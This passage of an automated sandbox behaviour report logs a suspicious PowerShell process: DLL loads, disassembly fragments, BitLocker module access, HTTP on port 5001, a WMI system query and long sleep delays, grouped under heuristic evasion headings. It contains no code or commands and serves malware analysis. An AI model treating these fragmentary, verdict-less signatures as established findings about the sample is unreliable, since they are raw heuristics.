Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0516D2A0 push eax; mov dword ptr [esp], edx0_2_0516D2B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB0D78 push cs; retf 0_2_07CB0F06
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB0696 push es; retf 0_2_07CB069E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB5658 push edi; retf 0_2_07CB57FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB54A0 push esi; retf 0_2_07CB5646
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB5358 push esp; retf 0_2_07CB548E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB533A push ebx; retf 0_2_07CB5346
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB52E2 push edx; retf 0_2_07CB52EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB5095 push eax; retf 0_2_07CB5096
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB4F70 push ecx; retf 0_2_07CB51F6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_07CB1BD0 push ds; retf 0_2_07CB1EDE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0A402264 push E801005Eh; ret 0_2_0A402269
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0A402564 push E801005Eh; ret 0_2_0A402569

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49737
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6060Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3664Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
